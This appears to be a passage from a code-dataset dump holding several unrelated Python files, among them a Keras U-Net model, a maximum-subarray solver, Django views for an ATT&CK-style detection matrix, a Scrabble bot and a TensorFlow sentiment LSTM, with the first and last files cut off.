Conv2D(filters, (3, 3), dilation_rate=2, padding='same')(x)\r\n\r\n if drop_out > 0:\r\n x1 = Dropout(drop_out)(x1)\r\n\r\n x1 = BatchNormalization()(x1)\r\n x1 = Activation('relu')(x1)\r\n\r\n x2 = Conv2D(filters, (3, 3), padding='same')(x)\r\n\r\n if drop_out > 0:\r\n x2 = Dropout(drop_out)(x2)\r\n\r\n x2 = BatchNormalization()(x2)\r\n x2 = Activation('relu')(x2)\r\n\r\n x3 = add([x1, x2])\r\n\r\n x3 = GlobalAveragePooling2D()(x3)\r\n\r\n x3 = Dense(int(filters * compression))(x3)\r\n x3 = BatchNormalization()(x3)\r\n x3 = Activation('relu')(x3)\r\n\r\n x3 = Dense(filters)(x3)\r\n\r\n x3p = Activation('sigmoid')(x3)\r\n\r\n x3m = Lambda(lambda x: 1 - x)(x3p)\r\n\r\n x4 = multiply([x1, x3p])\r\n x5 = multiply([x2, x3m])\r\n\r\n return add([x4, x5])\r\n\r\ndef TB_UNet(input_shape=(IMAGE_SIZE, IMAGE_SIZE, 3), filters=16, compression=0.5, drop_out=0, half_net=False, attention_gates=True):\r\n\r\n inputShape = Input(input_shape)\r\n\r\n c1 = df_block(inputShape, filters, compression=compression, drop_out=drop_out)\r\n c1 = df_block(c1, filters, compression=compression, drop_out=drop_out)\r\n p1 = MaxPooling2D((2, 2))(c1)\r\n filters = 2 * filters\r\n\r\n c2 = df_block(p1, filters, compression=compression, drop_out=drop_out)\r\n c2 = df_block(c2, filters, compression=compression, drop_out=drop_out)\r\n p2 = MaxPooling2D((2, 2))(c2)\r\n filters = 2 * filters\r\n\r\n c3 = df_block(p2, filters, compression=compression, drop_out=drop_out)\r\n c3 = df_block(c3, filters, compression=compression, drop_out=drop_out)\r\n p3 = MaxPooling2D((2, 2))(c3)\r\n filters = 2 * filters\r\n\r\n c4 = df_block(p3, filters, compression=compression, drop_out=drop_out)\r\n c4 = df_block(c4, filters, compression=compression, drop_out=drop_out)\r\n p4 = MaxPooling2D((2, 2))(c4)\r\n filters = 2 * filters\r\n\r\n cm = df_block(p4, filters, compression=compression, drop_out=drop_out)\r\n cm = df_block(cm, filters, compression=compression, drop_out=drop_out)\r\n\r\n filters = filters // 2\r\n\r\n u4 = Conv2DTranspose(filters, (2, 2), strides=(2, 2), padding='same')(cm)\r\n\r\n if attention_gates:\r\n u4 = concatenate([u4, attention_layer(u4, c4, 1)], axis=3)\r\n else:\r\n u4 = concatenate([u4, c4], axis=3)\r\n\r\n if half_net:\r\n c5 = conv_bn_act(u4, filters, drop_out=drop_out)\r\n c5 = conv_bn_act(c5, filters, drop_out=drop_out)\r\n else:\r\n c5 = df_block(u4, filters, compression=compression, drop_out=drop_out)\r\n c5 = df_block(c5, filters, compression=compression, drop_out=drop_out)\r\n\r\n filters = filters // 2\r\n\r\n u3 = Conv2DTranspose(filters, (2, 2), strides=(2, 2), padding='same')(c5)\r\n\r\n if attention_gates:\r\n u3 = concatenate([u3, attention_layer(u3, c3, 1)], axis=3)\r\n else:\r\n u3 = concatenate([u3, c3], axis=3)\r\n\r\n if half_net:\r\n c6 = conv_bn_act(u3, filters, drop_out=drop_out)\r\n c6 = conv_bn_act(c6, filters, drop_out=drop_out)\r\n else:\r\n c6 = df_block(u3, filters, compression=compression, drop_out=drop_out)\r\n c6 = df_block(c6, filters, compression=compression, drop_out=drop_out)\r\n\r\n filters = filters // 2\r\n\r\n u2 = Conv2DTranspose(filters, (2, 2), strides=(2, 2), padding='same')(c6)\r\n\r\n if attention_gates:\r\n u2 = concatenate([u2, attention_layer(u2, c2, 1)], axis=3)\r\n else:\r\n u2 = concatenate([u2, c2], axis=3)\r\n\r\n if half_net:\r\n c7 = conv_bn_act(u2, filters, drop_out=drop_out)\r\n c7 = conv_bn_act(c7, filters, drop_out=drop_out)\r\n\r\n else:\r\n c7 = df_block(u2, filters, compression=compression, drop_out=drop_out)\r\n c7 = df_block(c7, filters, 
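# --- editor's example (added) ---
# df_block() above fuses a dilated branch (x1) and a plain branch (x2) with a
# learned per-channel gate p: the output is x1*p + x2*(1-p), a convex
# combination. The arithmetic in isolation, with numpy standing in for the
# Keras tensors:
import numpy as np

x1 = np.full(4, 2.0)                      # dilated-branch features
x2 = np.full(4, 6.0)                      # plain-branch features
p = np.array([0.25, 0.5, 0.75, 1.0])      # sigmoid gate per channel
fused = x1 * p + x2 * (1 - p)
print(fused)                              # [5. 4. 3. 2.]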
compression=compression, drop_out=drop_out)\r\n\r\n filters = filters // 2\r\n\r\n u1 = Conv2DTranspose(filters, (2, 2), strides=(2, 2), padding='same')(c7)\r\n\r\n if attention_gates:\r\n u1 = concatenate([u1, attention_layer(u1, c1, 1)], axis=3)\r\n else:\r\n u1 = concatenate([u1, c1], axis=3)\r\n\r\n if half_net:\r\n c8 = conv_bn_act(u1, filters, drop_out=drop_out)\r\n c8 = conv_bn_act(c8, filters, drop_out=drop_out)\r\n else:\r\n c8 = df_block(u1, filters, compression=compression, drop_out=drop_out)\r\n c8 = df_block(c8, filters, compression=compression, drop_out=drop_out)\r\n\r\n c9 = Conv2D(1, (1, 1), padding=\"same\", activation='sigmoid')(c8)\r\n\r\n return Model(inputs=[inputShape], outputs=[c9])\r\n\r\nif __name__ == \"__main__\":\r\n \r\n model = TB_UNet(attention_gates=attention_gates)\r\n \r\n model.summary()\r\n","repo_name":"ahmedeqbal/TB-DenseNet","sub_path":"TB-UNet.py","file_name":"TB-UNet.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29621354032","text":"import sys\n\n\ndef _solve_crossing(arr: list[int], lo: int, mi: int, hi: int) -> tuple[int, int, int]:\n l_sum = r_sum = -sys.maxsize - 1\n c_sum, l_max, r_max = 0, mi, mi + 1\n\n for i in range(mi, lo - 1, -1):\n c_sum += arr[i]\n if c_sum > l_sum:\n l_sum = c_sum\n l_max = i\n\n c_sum = 0\n for i in range(mi + 1, hi + 1):\n c_sum += arr[i]\n if c_sum > r_sum:\n r_sum = c_sum\n r_max = i\n\n c_sum = l_sum + r_sum\n if l_sum > r_sum and l_sum > c_sum:\n return l_max, mi, l_sum\n elif r_sum > l_sum and r_sum > c_sum:\n return mi + 1, r_max, r_sum\n\n return l_max, r_max, c_sum\n\n\ndef solve(arr: list[int], lo: int, hi: int) -> tuple[int, int, int]:\n \"\"\"Solve the Maximum Subarray problem with random integer array input.\n\n >>> solve([12, -2, -23, 18, -1, -14, -21, 16, 19, -5, 10, -3, -20, 13, -4, -7], 0, 15)\n (7, 10, 40)\n \"\"\"\n if lo == hi:\n return lo, hi, arr[lo]\n\n mi = (lo + hi) // 2\n l_tup = solve(arr, lo, mi)\n r_tup = solve(arr, mi + 1, hi)\n c_tup = _solve_crossing(arr, lo, mi, hi)\n\n if l_tup[2] > r_tup[2] and l_tup[2] > c_tup[2]:\n return l_tup\n\n if r_tup[2] > l_tup[2] and r_tup[2] > c_tup[2]:\n return r_tup\n\n return c_tup\n\n\nif __name__ == '__main__':\n import doctest\n\n doctest.testmod()\n","repo_name":"khoaji/algorithm","sub_path":"divide_conquer/maximum_subarray.py","file_name":"maximum_subarray.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10934940806","text":"#!python3\n\nimport requests,bs4,webbrowser,sys\n\nURL='https://www.baidu.com/s?wd=' + ''.join(sys.argv[1:])\nheaders={\n\t\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36\"\n}\n\n\nprint('Googling...')\nres=requests.get(URL,headers=headers)\nres.raise_for_status()\n\nsoup=bs4.BeautifulSoup(res.text,'html.parser')\nlinkElems=soup.select('.t a')\n\nnumOpen=min(5, len(linkElems))\nfor i in range(numOpen):\n\twebbrowser.open(linkElems[i].get('href'))\n\n\n","repo_name":"414aj/learn_1","sub_path":"lucky.py","file_name":"lucky.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21104870407","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom 
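# --- editor's example (added) ---
# A brute-force cross-check for the divide-and-conquer solve() above; handy
# because _solve_crossing() also covers the one-sided and all-negative cases.
def brute_force_max_subarray(arr):
    best = None
    for lo in range(len(arr)):
        total = 0
        for hi in range(lo, len(arr)):
            total += arr[hi]
            if best is None or total > best:
                best = total
    return best

arr = [12, -2, -23, 18, -1, -14, -21, 16, 19, -5, 10, -3, -20, 13, -4, -7]
assert brute_force_max_subarray(arr) == 40   # matches solve(arr, 0, 15)[2]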
matrix.models import Tactic, Technique, Platform, DataSource, Note, SigmaRule, LogSource\nfrom django.conf import settings\nfrom django.views import generic\nimport os\nfrom django.urls import reverse\nimport datetime\nfrom django.views.generic import TemplateView\nfrom django import template\nfrom markdownx.utils import markdownify\nfrom django.urls import reverse_lazy\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom matrix.forms import noteForm\n\n\ndef index(request):\n \"\"\"View function for home page of site.\"\"\"\n\n ## Generate the number of tactics and names\n num_tactics = Tactic.objects.all().count()\n tactics = Tactic.objects.all().order_by('tactic_id')\n tactic_names = list()\n tactic_shortnames = list()\n techniques_by_tactic = {}\n for tactic in tactics:\n tactic_names.append(tactic.tactic_name)\n tactic_techniques = Technique.objects.filter(tactic_name=tactic).order_by('technique_name')\n techniques_by_tactic[tactic.tactic_name] = tactic_techniques\n\n ## Define the context \n context = {\n 'techniques_by_tactic': techniques_by_tactic,\n }\n\n ## Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context)\n #return render(request, 'test.html', context)\n\n#class SigmaRuleView(generic.ListView):\n# model = SigmaRule\n\ndef alltactics(request):\n total_tactics = Tactic.objects.all()\n context = {\n 'total_tactics': total_tactics,\n }\n\n ## Render the HTML template index.html with the data in the context variable\n return render(request, 'matrix/tactic_list.html', context=context)\n\ndef allTechPerTactic(request):\n techfortactics = Technique.objects.filter(tactic_name='Impact')\n tactfortactics = Tactic.objects.filter(tactic_name='Impact')\n\n ## Define the context\n context = {\n 'techfortactics': techfortactics,\n 'tactfortactics': tactfortactics,\n }\n ## Render the HTML template index.html with the data in the context variable\n return render(request, 'matrix/tech_for_tactic.html', context)\n\n\nclass TacticDetailView(generic.DetailView):\n model = Tactic\n #template_name = 'matrix/TacticTemplate.html'\n\nclass TechniqueDetailView(generic.DetailView):\n model = Technique\n\ndef alltechniques(request):\n total_techniques = Technique.objects.all()\n context = {\n 'total_techniques': total_techniques,\n }\n\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'matrix/technique_list.html', context)\n\nclass TacticListView(TemplateView):\n template_name = \"TacticTemplate\"\n\nclass TechniqueListView(generic.ListView):\n model = Technique\n\ndef atomics(request, pk):\n atomic = Technique.objects.get(pk=pk)\n atomic_file = open(settings.MEDIA_ROOT + '/atomics/' + atomic.technique_id + \".md\", 'r')\n atom = atomic_file.read()\n atomic_file.close()\n context = {\n 'atomic' : atomic,\n 'atom' : markdownify(atom),\n }\n\n return render(request, 'matrix/atomic.html', context)\n\ndef addnote(request, pk):\n if request.method == \"POST\":\n form = noteForm(request.POST)\n if form.is_valid():\n note = form.save(commit=True)\n note.save()\n return redirect('individualTechnique', pk=pk)\n\n else:\n technique = Technique.objects.get(pk=pk)\n # Get all notes for a given technique\n notes = Note.objects.filter(technique_id=pk)\n form = noteForm()\n form.fields['technique'].initial = pk \n form.fields['date'].initial = datetime.datetime.now()\n\n #return render(request, 'matrix/addnote.html', context)\n #return 
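# --- editor's example (added) ---
# Views like atomics() above call Technique.objects.get(pk=pk) directly, so an
# unknown id raises DoesNotExist (an HTTP 500). A common Django alternative --
# a sketch that assumes the Technique/settings/markdownify imports already
# present in this module:
from django.shortcuts import get_object_or_404

def atomics_safe(request, pk):
    atomic = get_object_or_404(Technique, pk=pk)   # 404 instead of 500
    with open(settings.MEDIA_ROOT + '/atomics/' + atomic.technique_id + '.md') as f:
        atom = f.read()
    return render(request, 'matrix/atomic.html',
                  {'atomic': atomic, 'atom': markdownify(atom)})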
HttpResponseRedirect(reverse('addnote', args=(technique.technique_id,)))\n return render(request, 'matrix/noteForm.html', {'form': form})\n\n\nclass NoteDelete(DeleteView):\n model = Note\n success_url = reverse_lazy('notes')\n\n\ndef noteCreator(request, pk):\n technique = Technique.objects.get(pk=pk)\n # Get all notes for a given technique\n notes = Note.objects.filter(technique_id=technique.technique_id)\n \n addnote = \"This is a new note\"\n\n #Define the context\n context = {\n 'addnote': addnote,\n 'notes': notes,\n 'note': addnote,\n }\n\n return render(request, 'matrix/noteForm.html', context)\n #return render(request, /)\n\n\nclass NoteCreate(CreateView):\n model = Note\n fields = '__all__'\n initial = {'date': datetime.datetime.now(), 'note': 'notes'}\n\nclass NoteUpdate(UpdateView):\n model = Note\n fields = ['note', 'date', 'technique']\n\nclass NoteDetailView(generic.DetailView):\n model = Note\n tech = Technique\n\nclass NoteListView(generic.ListView):\n model = Note\n\ndef notesPerTech(request, pk):\n # Fetch the technique first; the original referenced an undefined name below\n technique = Technique.objects.get(pk=pk)\n # Get all notes for a given technique\n notes = Note.objects.filter(technique_id=pk)\n all_notes = list()\n for note in notes:\n all_notes.append(note.note)\n\n #Define the context\n context = {\n 'tech_notes': all_notes,\n 'tech_id': technique,\n }\n\n return render(request, 'matrix/notes_for_tech.html', context)\n\ndef updateNotesPerTech(request, pk):\n #technique = get_object_or_404(Technique, pk=pk)\n note = Note.objects.get(pk=pk)\n technique = Technique.objects.get(technique_name=note.technique)\n # Get all notes for a given technique\n notes = Note.objects.filter(technique_id=pk)\n all_notes = list()\n for note in notes:\n all_notes.append(note.note)\n\n #Define the context\n context = {\n 'tech_notes': all_notes,\n 'tech_id': technique,\n }\n\n return render(request, 'note_update', context)\n\ndef addTechnique(request):\n platforms = Platform.objects.all()\n dataSources = DataSource.objects.all()\n tactics = Tactic.objects.all()\n context = {\n 'platforms': platforms,\n 'dataSources': dataSources,\n 'tactics': tactics,\n }\n return render(request, 'matrix/addTechnique.html' ,context)\n\ndef addSigma(request):\n context = {\n 'hi': \"hi\",\n }\n return render(request, 'matrix/addSigma.html' ,context)\n\n\ndef individualTechnique(request, pk):\n technique = Technique.objects.get(pk=pk)\n platforms = Platform.objects.filter(technique=technique.technique_id)\n data_sources = DataSource.objects.filter(technique=technique.technique_id)\n tactics = Tactic.objects.filter(technique=technique.technique_id)\n ## Get all notes for a given technique\n notes = Note.objects.filter(technique_id=technique.technique_id)\n all_notes = notes[::-1]\n\n ## SIGMA RULES\n sigma_rules = list()\n rules = SigmaRule.objects.filter(technique=technique.technique_id)\n rule_names = list()\n yaml_rule_list = list()\n for rule in rules:\n sigma_rules.append(\"/sigma_rules/\" + rule.rule_name + \".yml\")\n sigma = open(settings.MEDIA_ROOT + '/' + rule.rule_file.name ,'r')\n yaml_rule_list.append([rule.rule_name, sigma.read()])\n sigma.close()\n\n ## ATOMICS\n atomic = technique\n null_atom = \"\"\n try:\n atomic_file = open(settings.MEDIA_ROOT + '/atomics/' + atomic.technique_id + \".md\", 'r')\n atomic_yaml = open(settings.MEDIA_ROOT + '/atomics/' + atomic.technique_id + \".yaml\", 'r')\n atom = atomic_file.read()\n atom_yaml = atomic_yaml.read()\n atomic_file.close()\n atomic_yaml.close()\n except:\n null_atom = \"There are currently no Atomic Red Team tests available for this technique.\"\n 
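# --- editor's example (added) ---
# individualTechnique() above reverses the queryset in Python (notes[::-1]) to
# show newest notes first; ordering in the database is usually preferable.
# A sketch assuming Note keeps the 'date' field that noteForm fills in:
def latest_notes(technique_id):
    return Note.objects.filter(technique_id=technique_id).order_by('-date')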
atom_yaml = \"\"\n atom = \"\"\n\n \n ## Define the Context\n context = {\n 'technique': technique,\n 'platforms': platforms,\n 'data_sources': data_sources,\n 'tactics': tactics,\n 'technique_description': markdownify(technique.technique_description),\n 'technique_url': technique.technique_url,\n 'technique_id': technique.technique_id,\n 'technique_detection': markdownify(technique.technique_detection),\n 'technique_name': technique.technique_name,\n 'atom': markdownify(atom),\n 'atom_yaml': atom_yaml,\n 'null_atom': null_atom,\n 'tech_notes': all_notes,\n 'yaml_rules': yaml_rule_list,\n }\n return render(request, 'matrix/technique.html', context = context)\n\n","repo_name":"Elemental-attack/Elemental","sub_path":"elemental/matrix/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8362,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"77"} +{"seq_id":"75237689527","text":"from reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import A4, letter\n\nw, h = A4\n\n# creating a pdf object\nc = canvas.Canvas(\"texts.pdf\")\n\ntext = c.beginText(50, h - 50)\ntext.setFont(\"Times-Roman\", 12)\n\ntext.textLine(\"Hello world!\")\ntext.textLine(\"From ReportLab and Python!\")\ntext.textLines(\"Hello world!\\n\\n\\n\\n\\nFrom ReportLab and Python!\")\n\nc.drawText(text)\n\nc.save()\n","repo_name":"mostafijur-rahman299/python-reportlab-example","sub_path":"texts.py","file_name":"texts.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6387751288","text":"import random\nimport visualizers\nfrom scrabble import *\n\nclass Bot():\n def best_moves(self, board, rack, bag):\n squares_exhausted = set()\n squares_to_consider = []\n best_move = Move(Move.PLAY)\n current_letters = []\n current_position = Position()\n\n self.best_score = 0\n self.primary_score = 0\n self.primary_multiplier = 1\n self.secondary_score = 0\n\n for row in xrange(board.height):\n for col in xrange(board.width):\n pos = Position(row, col)\n if board.is_next_to_letter(pos) and not board.letter_at(pos):\n squares_to_consider.append(pos)\n if not squares_to_consider and not board.letter_at(board.get_center()):\n squares_to_consider.append(board.get_center())\n\n def try_moves_at(square):\n position = square.copy()\n position.direction = Position.DOWN\n try_moves_back(position)\n\n position = square.copy()\n position.direction = Position.ACROSS\n try_moves_back(position)\n\n squares_exhausted.add(str(square))\n\n def points_for_letter_at_square(letter, square):\n return board.letter_multiplier_at(square) * bag.get_letter_value(letter)\n\n def points_for_crossword_at(square):\n total = 0\n is_crossword = False\n\n square.switch_direction()\n back_pos = square.copy()\n forward_pos = square.copy()\n square.switch_direction()\n\n back_pos.step(-1)\n forward_pos.step(1)\n\n letter = board.letter_at(back_pos)\n while letter:\n is_crossword = True\n total += bag.get_letter_value(letter)\n back_pos.step(-1)\n letter = board.letter_at(back_pos)\n\n letter = board.letter_at(forward_pos)\n while letter:\n is_crossword = True\n total += bag.get_letter_value(letter)\n forward_pos.step(1)\n letter = board.letter_at(forward_pos)\n\n if not is_crossword:\n return 0\n\n new_letter = board.letter_at(square)\n total += bag.get_letter_value(new_letter) * board.letter_multiplier_at(square)\n\n total *= board.word_multiplier_at(square)\n return total\n\n def 
place_letter_on_board(letter, square):\n board.set_letter_at(letter, square)\n rack.remove(letter)\n\n self.secondary_score += points_for_crossword_at(square)\n self.primary_score += points_for_letter_at_square(letter, square)\n self.primary_multiplier *= board.word_multiplier_at(square)\n\n def remove_letter_from_board(letter, square):\n self.secondary_score -= points_for_crossword_at(square)\n self.primary_score -= points_for_letter_at_square(letter, square)\n self.primary_multiplier /= board.word_multiplier_at(square)\n\n board.remove_letter_at(square)\n rack.append(letter)\n\n def current_score():\n return self.primary_score * self.primary_multiplier + self.secondary_score\n\n def is_potential_word_at(square):\n word = board.word_at(square)\n if not word or len(word) < 2:\n return True\n return self.index.has_word_containing(word)\n\n def is_crossword_valid_at(square):\n word = board.word_at(square.switched_direction())\n if not word or len(word) < 2:\n return True\n return self.index.word_list.is_word(word)\n\n def try_moves_back(square):\n original_square = square.copy()\n for letter in rack:\n place_letter_on_board(letter, square)\n current_position.copy_from(original_square)\n current_letters.reverse()\n current_letters.append(letter)\n current_letters.reverse()\n\n if ( is_crossword_valid_at(square) and\n is_potential_word_at(square) ):\n\n valid = board.step_until_empty(square, -1)\n try_moves_forward(square)\n\n if valid and not str(square) in squares_exhausted:\n try_moves_back(square)\n\n current_letters.pop(0)\n square.copy_from(original_square)\n remove_letter_from_board(letter, square)\n\n def try_moves_forward(square):\n # if score of current placement is good, huzzah!\n word = board.word_at(square)\n score = current_score()\n if word and self.index.word_list.is_word(word):\n # Consider the move\n if not best_move.letters or score > self.best_score:\n self.best_score = score\n best_move.set_letters(\"\".join(current_letters))\n best_move.set_position(current_position.copy())\n\n original_square = square.copy()\n\n valid = board.step_until_empty(square, 1)\n starting_square = square.copy()\n if valid and not str(square) in squares_exhausted:\n for letter in rack:\n place_letter_on_board(letter, square)\n current_letters.append(letter)\n\n if ( is_crossword_valid_at(square) and\n is_potential_word_at(square) ):\n try_moves_forward(square)\n\n current_letters.pop()\n square.copy_from(starting_square)\n remove_letter_from_board(letter, square)\n\n square.copy_from(original_square)\n\n for square in squares_to_consider:\n # Find best moves at that square\n try_moves_at(square)\n\n if not best_move.letters:\n best_move.set_move_type(Move.PASS)\n\n return best_move\n\n def get_move(self, game):\n board = game.board\n rack = game.current_rack()\n bag_template = game.bag.template\n move = self.best_moves(board, rack, bag_template)\n return move\n\n def __init__(self, index=None):\n self.index = index\n\nclass Index():\n GAP_SYMBOL = \"?\"\n\n def index_word_with(self, word, size=3, gaps_at=None):\n if len(word) >= size:\n for i in xrange(len(word) - size + 1):\n part = word[i:i+size]\n if gaps_at:\n for gap in gaps_at:\n part = part[:gap-1] + self.GAP_SYMBOL + part[gap:]\n if part not in self.index:\n self.index[part] = []\n self.index[part].append(word)\n\n def index_whole_words_with_one_gap(self):\n for word in self.word_list.words:\n size = len(word)\n for gap_pos in xrange(size):\n self.index_word_with(word, size, [gap_pos+1])\n\n def index_words_with(self, size, 
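# --- editor's example (added) ---
# best_moves() above keeps three running counters so tiles can be placed and
# removed in O(1) during the search; a move's score is always
# primary_score * primary_multiplier + secondary_score. The formula in
# isolation (the numbers are a made-up placement on one double-word square):
primary_score = 4 + 1 + 1        # letter points of the main word
primary_multiplier = 2           # one double-word square covered
secondary_score = 7              # a completed crossword along the way
assert primary_score * primary_multiplier + secondary_score == 19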
gaps_at=None):\n for word in self.word_list.words:\n self.index_word_with(word, size=size, gaps_at=gaps_at)\n\n def index_word(self, word):\n for size in range(1,15):\n self.index_word_with(word, size=size)\n\n def set_word_list(self, word_list):\n self.word_list = word_list\n for word in word_list.words:\n self.index_word(word.upper())\n\n def has_word_containing(self, pattern):\n return pattern in self.index\n\n def has_words_matching(self, pattern):\n return pattern in self.index\n\n def get_words_matching(self, pattern):\n pattern = pattern.upper()\n if pattern in self.index:\n return self.index[pattern]\n\n # index_patterns:\n # ???\n # ????\n # ^??\n # ?_?\n # ^?_?$\n # ...\n\n def __init__(self):\n self.word_list = None\n self.index = {}\n","repo_name":"dbieber/ScrabbleBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7860,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"29884473693","text":"import tensorflow as tf\nimport numpy as np\nimport glob #this will be useful when reading reviews from file\nimport os\nimport tarfile\nimport re\nimport string\n\n\nbatch_size = 50\nacc = 64\nnumClasses = 2\nmaxSeqLength = 40 #Maximum length of sentence\nnumDimensions = 50 #Dimensions for each word vector\n\n\ndef extract_data(filename):\n \"\"\"Extract data from tarball and store as list of strings\"\"\"\n if not os.path.exists(os.path.join(os.path.dirname(__file__), 'reviews/')):\n with tarfile.open(filename, \"r\") as tarball:\n dir = os.path.dirname(__file__)\n tarball.extractall(os.path.join(dir, 'reviews/'))\n return\n\ndef read_data():\n print(\"READING DATA\")\n dir = os.path.dirname(__file__)\n file_list = glob.glob(os.path.join(dir, 'reviews/pos/*'))\n file_list.extend(glob.glob(os.path.join(dir, 'reviews/neg/*')))\n print(\"Parsing %s files\" % len(file_list))\n return file_list\n\ndef load_data(glove_dict):\n \"\"\"\n Take reviews from text files, vectorize them, and load them into a\n numpy array. Any preprocessing of the reviews should occur here. The first\n 12500 reviews in the array should be the positive reviews, the 2nd 12500\n reviews should be the negative reviews.\n RETURN: numpy array of data with each row being a review in vectorized\n form\"\"\"\n extract_data('reviews.tar.gz')\n reviewData = read_data()\n reviewArray = np.zeros(shape=(25000,40), dtype=int)\n index = 0\n\n for rev in reviewData:\n with open(rev, \"r\", encoding='utf-8') as fileinput:\n reviewText = \"\"\n for line in fileinput:\n line = line.rstrip().lower()\n line = re.sub(\"
\",' ',line)\n line = re.sub('[%s]' % string.punctuation,'',line)\n reviewText = reviewText + \" \" + line\n #print(line)\n #print (\"Review: \" + reviewText + \"\\n\")\n npArray = np.array(reviewText.split(' '))\n npArray = list(filter(None, npArray))\n npArray = np.asarray(npArray)\n if len(npArray) > maxSeqLength:\n npArray = npArray[:maxSeqLength]\n #print(npArray)\n for n,i in enumerate(npArray):\n if i in glove_dict:\n npArray[n]=glove_dict[i]\n else:\n npArray[n] = \"0\"\n npArray = npArray.astype(int)\n if len(npArray) != maxSeqLength:\n npArray = np.pad(npArray, pad_width=(0, maxSeqLength-len(npArray)), mode='constant')\n #print(npArray)\n reviewArray[index] = npArray\n index = index + 1\n\n print('files finished')\n print(reviewArray[5])\n data = reviewArray\n return data\n\ndef load_glove_embeddings():\n \"\"\"\n Load the glove embeddings into a array and a dictionary with words as\n keys and their associated index as the val. Assumes the glove\n embeddings are located in the same directory and named \"glove.6B.50d.txt\"\n RETURN: embeddings: the array containing word vectors\n word_index_dict: a dictionary matching a word in string form to\n its index in the embeddings array. e.g. {\"apple\": 119\"}\n \"\"\"\n\n data = open(\"glove.6B.50d.txt\",'r', encoding=\"utf-8\")\n lines = data.readlines()\n #if you are running on the CSE machines, you can load the glove data from here\n #data = open(\"/home/cs9444/public_html/17s2/hw2/glove.6B.50d.txt\",'r',encoding=\"utf-8\")\n i = 1\n lineCount = len(lines)\n print(lineCount)\n embeddings = np.zeros(shape=(lineCount,50), dtype=np.float32)\n word_index_dict = {}\n word_index_dict[\"UNK\"] = 0\n\n for line in lines:\n lineSplit = line.split(' ', 1)\n word = lineSplit[0]\n line = lineSplit[1]\n\n npArray = np.fromstring(line, dtype=float, sep=' ')\n\n embeddings[i-1] = npArray\n\n word_index_dict[word] = i\n i = i + 1\n\n #test print\n print(embeddings[1])\n print(word_index_dict[\",\"])\n return embeddings, word_index_dict\n\n\ndef define_graph(glove_embeddings_arr):\n \"\"\"\n Define the tensorflow graph that forms your model. You must use at least\n one recurrent unit. The input placeholder should be of size [batch_size,\n 40] as we are restricting each review to it's first 40 words. 
The\n following naming convention must be used:\n Input placeholder: name=\"input_data\"\n labels placeholder: name=\"labels\"\n accuracy tensor: name=\"accuracy\"\n loss tensor: name=\"loss\"\n\n RETURN: input placeholder, labels placeholder, dropout_keep_prob, optimizer, accuracy and loss\n tensors\"\"\"\n lstm_units = 32\n dropoutRate = 0.6\n\n labels = tf.placeholder(name=\"labels\", dtype=tf.float32, shape=[batch_size,numClasses])\n input_data = tf.placeholder(name=\"input_data\", dtype=tf.int32, shape=[batch_size,maxSeqLength])\n embedData = tf.nn.embedding_lookup(glove_embeddings_arr, input_data)\n\n dropout_keep_prob = tf.placeholder_with_default(dropoutRate, name=\"dropout_keep_prob\", shape=())\n\n lstm = tf.contrib.rnn.BasicLSTMCell(lstm_units)\n lstm = tf.contrib.rnn.DropoutWrapper(cell=lstm, output_keep_prob=dropout_keep_prob)\n val, _ = tf.nn.dynamic_rnn(lstm, embedData, dtype=tf.float32)\n\n w = tf.Variable(tf.truncated_normal([lstm_units, 2]))\n b = tf.Variable(tf.constant(0.1, shape=[2]))\n val = tf.transpose(val, [1, 0, 2])\n last = tf.gather(val, int(val.get_shape()[0]) - 1)\n pred = (tf.matmul(last, w) + b)\n\n correctPred = tf.equal(tf.argmax(pred,1), tf.argmax(labels,1))\n accuracy = tf.reduce_mean(tf.cast(correctPred, dtype=tf.float32))\n\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=labels))\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n\n accuracy = tf.identity(accuracy, name=\"accuracy\")\n loss = tf.identity(loss, name=\"loss\")\n\n return input_data, labels, dropout_keep_prob, optimizer, accuracy, loss\n","repo_name":"maxhuynh/9444-assn2","sub_path":"implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72419697529","text":"# -*- coding: utf-8 -*-\n\"\"\"\nNotes:\n To use various backends certian packages are required\n\n PyQt\n ...\n\n Tk\n pip install\n sudo apt-get install tk\n sudo apt-get install tk-dev\n\n Wx\n pip install wxPython\n\n GTK\n pip install PyGTK\n pip install pygobject\n pip install pygobject\n\n Cairo\n pip install pycairo\n pip install py2cairo\n pip install cairocffi\n sudo apt-get install libcairo2-dev\n\n\nCommandLine:\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=GTKAgg\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=TkAgg\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=WxAgg\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=WebAgg\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=gdk\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=cairo\n\n\"\"\"\nimport os\nimport sys\n\nimport utool as ut\n\nut.noinject(__name__, '[plottool.__MPL_INIT__]')\n\ntry:\n import builtins\n\n profile = getattr(builtins, 